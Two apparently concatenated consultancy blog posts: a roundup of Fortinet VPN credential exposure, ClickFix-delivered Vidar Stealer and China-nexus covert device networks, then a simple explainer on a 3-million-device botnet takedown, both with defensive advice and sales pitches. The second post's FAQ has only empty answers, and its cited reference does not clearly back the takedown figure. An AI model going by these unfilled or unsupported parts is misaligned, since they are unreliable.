TL;DR

Three major threat campaigns are active right now — a leak exposing VPN credentials for 73,000+ Fortinet devices worldwide, malware delivery targeting Australian infrastructure through compromised WordPress sites, and China-nexus threat actors building covert device networks. The average data breach now costs $4.9 million USD, and Australian businesses are squarely in the crosshairs. The difference between being a victim and being a near-miss almost always comes down to fundamentals: patching, MFA, and segmentation.

1. FortiBleed: 73,000 Fortinet VPN Credentials Exposed

A newly discovered data leak, dubbed "FortiBleed," has exposed what appears to be a collection of Fortinet and FortiGate VPN credentials for 73,932 firewall URLs at organizations worldwide. The dataset was surfaced publicly, meaning anyone from opportunistic criminals to nation-state actors can potentially pivot through exposed VPN endpoints into corporate networks.

What this means in dollars: Fortinet SSL-VPN appliances have been a recurring target. The 2024 exploit of CVE-2024-21762 and related FortiOS vulnerabilities led to mass compromise campaigns. Organizations that failed to patch faced not only ransomware but full network takeovers. IBM's Cost of a Data Breach Report places the average breach involving stolen or compromised credentials at approximately $4.65 million USD — and that figure climbs sharply when the initial access vector is an unmonitored VPN appliance that attackers have weeks or months to exploit before detection.

How victims could have saved millions:

  • Apply Fortinet security advisories within 48 hours of release — the patches for these CVEs were available before exploitation peaked
  • Disable SSL-VPN access for accounts that don't need it, and enforce hardware-bound MFA on every VPN session
  • Rotate VPN credentials immediately if your device appears in any credential exposure dataset — check your Fortinet serial numbers against the advisory lists
  • Segment VPN access zones so a compromised endpoint cannot reach production, finance, or backup systems

Do this week: Log into your Fortinet console, confirm firmware is on the latest patched release, and verify every VPN user has MFA. If you can't, restrict the VPN to a single jump host.

2. ClickFix: Malware Delivery Targeting Australian Infrastructure

The Australian Signals Directorate (ASD) has issued an advisory warning that threat actors are using a social engineering technique called ClickFix to distribute Vidar Stealer malware through compromised WordPress websites, with Australian networks specifically named as targets.

ClickFix works by tricking visitors into believing they need to "fix" a problem on the page — a fake CAPTCHA, a verification prompt, or a broken plugin message. The victim is instructed to copy and paste a command into their terminal or run a script. That command delivers Vidar, an information-stealing trojan that harvests saved browser passwords, session cookies, cryptocurrency wallets, and SSH keys before the attacker ever needs to break through a perimeter.

The cost of an info-stealer infection: Unlike ransomware, Vidar infections are often silent. Credentials are exfiltrated and sold on dark web markets for weeks before a business realizes accounts have been compromised. The median time to identify and contain a data breach globally is 258 days — during which stolen credentials enable follow-on fraud, invoice redirection, and ransomware deployment. BEC (business email compromise) losses tied to stolen credentials averaged $50,000 AUD per incident for Australian SMBs in recent reports, with total losses across reported incidents exceeding hundreds of millions annually.

How victims could have saved millions:

  • Block execution of unsigned scripts and macros via group policy or EDR — Vidar cannot install if the initial payload can't run
  • Train staff to recognize ClickFix prompts and never copy-paste commands from web pages — this is now an ASD-documented threat pattern
  • Audit WordPress sites your business owns or depends on — outdated plugins are the entry point
  • Use a password manager with hardware-bound credentials so stolen session cookies can't be replayed

Do this week: Check whether your organization runs any WordPress sites, confirm they're updated, and brief your team: never run a command a website tells you to paste.

3. China-Nexus Covert Networks: Supply Chain at Scale

In a joint advisory, the ASD's ACSC, alongside Five Eyes partner agencies, outlined a significant shift in tactics by China-nexus cyber actors who are building covert networks of compromised devices — including SOHO routers, IoT cameras, and network appliances — to use as infrastructure for espionage, pre-positioning, and facilitating other attacks including ransomware.

This is not a single breach. It's a campaign that enables thousands of breaches. Compromised consumer and small-business devices are chained together into proxy networks that attackers use to hide their origin, relay commands, and stage payloads against larger targets. If your business supplies, integrates with, or shares network trust with a compromised device, you become part of the attack chain.

The supply chain cost multiplier: Supply chain compromise breaches are the most expensive category tracked by IBM, averaging $4.55–5.5 million USD per incident — 11–16% higher than the overall average. When attackers pivot through a trusted supplier, the victim organization has often already granted the connection implicit trust, bypassing controls that would otherwise stop an external attacker.

How victims could have saved millions:

  • Treat every supplier network connection as untrusted — apply network segmentation and monitoring to vendor and partner links
  • Inventory all internet-facing devices, including those managed by third parties; many compromised devices in these campaigns are forgotten appliances no one knew were exposed
  • Implement egress filtering so compromised internal devices cannot beacon to unknown command-and-control infrastructure
  • Replace end-of-life SOHO routers and IoT devices — these are the primary recruitment targets for covert networks

Do this week: Download the joint advisory, identify any internet-exposed devices on your network (routers, cameras, DVRs, appliances), and apply the listed mitigations.

FAQ

Q: My business is too small to be targeted by nation-state actors. Is this relevant to me? Small businesses are not the end target — they're the stepping stone. The covert device networks described in the ACSC advisory specifically recruit SOHO routers and small-business appliances. Your compromised device may be used to attack a larger organization you do business with, and the forensic trail leads back to you.

Q: We have MFA on our VPN. Are we safe from FortiBleed? Partially. MFA significantly raises the bar, but if attackers have valid credentials and an unpatched VPN appliance, they may exploit the appliance directly rather than logging in through the normal flow. Patching and MFA together are the effective control — neither alone is sufficient.

Q: How do I know if my credentials appeared in the FortiBleed leak? Check your Fortinet device serial numbers and firewall URLs against the exposure lists published by security researchers. If your organization uses a threat intelligence feed or managed detection provider, request a check. When in doubt, rotate all VPN and admin credentials immediately.

Q: What's the single most cost-effective security control for an Australian SMB right now? Hardware-bound MFA (FIDO2 keys or passkeys) on all email, VPN, and administrative accounts. Stolen credentials are the #1 initial access vector across every campaign described in this article. Phishing-resistant MFA blocks it outright.

Conclusion

The breaches making headlines this month — FortiBleed, ClickFix, and state-sponsored device networks — share a common thread: they exploit gaps in fundamentals, not zero-days. Unpatched VPN appliances, untrained users pasting malware commands, and unmonitored internet-facing devices are not exotic attack vectors. They're the same problems security professionals have been flagging for years, and attackers know most organizations still haven't closed the gaps.

The organizations that avoid the million-dollar losses are not the ones buying the most expensive tools. They're the ones patching on schedule, enforcing MFA, segmenting their networks, and training their people. Every breach in this roundup had a known, documented mitigation available before the damage occurred.

Don't wait for the headline about your business. Visit consult.lil.business for a free cybersecurity assessment and find out exactly where your gaps are before someone else does.

References

  1. ASD ACSC Advisory — Defending against China-nexus covert networks of compromised devices
  2. ASD ACSC Advisory — ClickFix distributing Vidar Stealer via WordPress targeting Australian infrastructure
  3. IBM Cost of a Data Breach Report — 2024 findings and benchmarks
  4. BleepingComputer — FortiBleed leak exposes Fortinet VPN credentials for 73,000 devices
  5. CISA — Cross-Sector Cybersecurity Performance Goals (CPG) for SMB baseline security

TL;DR

  • The U.S. government shut down a network of 3 million hacked devices — mostly routers and cameras — that were being controlled by criminals
  • These devices worked normally for their owners while secretly helping criminals attack other targets
  • Your office router, security cameras, and smart devices could be hijacked without you ever noticing
  • Simple steps like changing default passwords and updating device software can prevent this

What Is a Botnet?

Imagine someone figured out how to secretly mind-control thousands of toy robots. The robots still do their normal job — cleaning your room, playing music, whatever. But in the background, the controller can also make them do other things: spam your neighbors with junk mail, bang on someone's door all at once to keep them from opening it, or sneak around gathering information.

A botnet works the same way, but with real electronic devices. "Bot" means robot, and "net" means network. A botnet is a network of hijacked devices all controlled by one person or group. The devices — usually things like routers, security cameras, and smart home gadgets — still work normally for their owners. But they're also secretly following the commands of the bad guys.

What Happened?

The U.S. Department of Justice took down a botnet made up of about 3 million devices. These were mostly routers (the box that gives you WiFi), IP cameras (security cameras that connect to the internet), and other smart devices in homes and small businesses.

The criminals controlling these devices used them to:

  • Attack websites by flooding them with so much traffic they crash (called a DDoS attack)
  • Hide their identity by routing their internet activity through your device, so it looks like the bad activity is coming from your business
  • Scan for more victims to add to the botnet and make it even bigger

The owners of these 3 million devices mostly had no idea their equipment was compromised.

How Do Devices Get Hijacked?

Three main ways:

Default passwords. Many routers and cameras come with a pre-set password like "admin" or "password." If you never change it, it's like leaving your front door key under the mat — everyone knows where to look.

Old software that was never updated. Devices run software, and sometimes that software has holes in it. The manufacturer releases a fix, but if you don't install the update, the hole stays open. Bad guys know about these holes and specifically look for devices that haven't been updated.

Devices too old to get fixes. After a few years, manufacturers stop releasing updates for older devices. The device still works, but any new security holes that are discovered will never be fixed. It's like having a lock that the locksmith can't improve anymore.

Could This Be Happening to My Business?

If your office has a router that's been running for years without anyone checking it, a set of security cameras with factory-default passwords, or smart devices that have never been updated — then yes, it's possible.

The tricky part about botnets is that you usually can't tell your device has been hijacked. It still works. The internet still works. The cameras still record. Everything seems fine. The criminal activity happens silently in the background.

What Can You Do?

Change every default password. Log into your router, cameras, and any other smart devices. Change the admin password to something strong and unique. This is the single most effective thing you can do.

Update the software on your devices. Check the manufacturer's website for your router and cameras. If there's a newer version of the software (called "firmware"), install it. Set a reminder to check every few months.

Replace really old equipment. If your router is more than 5 years old, check if the manufacturer still supports it. If they've stopped releasing updates, it's time for a new one. A new router costs a fraction of what dealing with a security problem costs.

Put smart devices on a separate network. Most modern routers let you set up a "guest" network. Put your cameras, smart TVs, and other gadgets on the guest network so they can't directly reach your business computers. If a camera gets hijacked, at least it can't spread to your important stuff.

Turn off remote access if you don't need it. Many routers let you manage them from anywhere on the internet. Unless you specifically need this, turn it off. It's one of the main ways bad guys get in.

Think of your office devices like the locks and windows in a physical building. You wouldn't leave windows open and doors unlocked. The same principle applies to your digital equipment — a little regular maintenance goes a long way.

Not sure if your office devices are secure? lilMONSTER helps small businesses check their routers, cameras, and smart devices for security problems — and fix them before bad guys find them. Talk to us →

FAQ

Q: What is the main security concern covered in this post? A:

Q: Who is affected by this? A:

Q: What should I do right now? A:

Q: Is there a workaround if I can't patch immediately? A:

Q: Where can I learn more? A:

References

[1] U.S. Department of Justice. "Justice Department Disrupts Botnet Used by Russia's GRU." DOJ Office of Public Affairs, 2024. https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian

[2] Cybersecurity and Infrastructure Security Agency (CISA). "Security Guidance for Critical Infrastructure." CISA, 2024. https://www.cisa.gov/topics/cybersecurity-best-practices/iot-security

[3] Australian Cyber Security Centre (ACSC). "Securing Internet of Things Devices." Australian Signals Directorate, 2023. https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/outsourcing-and-external-parties/internet-things

[4] Mandiant. "M-Trends 2024 Special Report." Google Cloud Mandiant, 2024. https://www.mandiant.com/resources/m-trends

Ready to strengthen your security?

Talk to lilMONSTER. We assess your risks, build the tools, and stay with you after the engagement ends. No clipboard-and-leave consulting.

Get a Free Consultation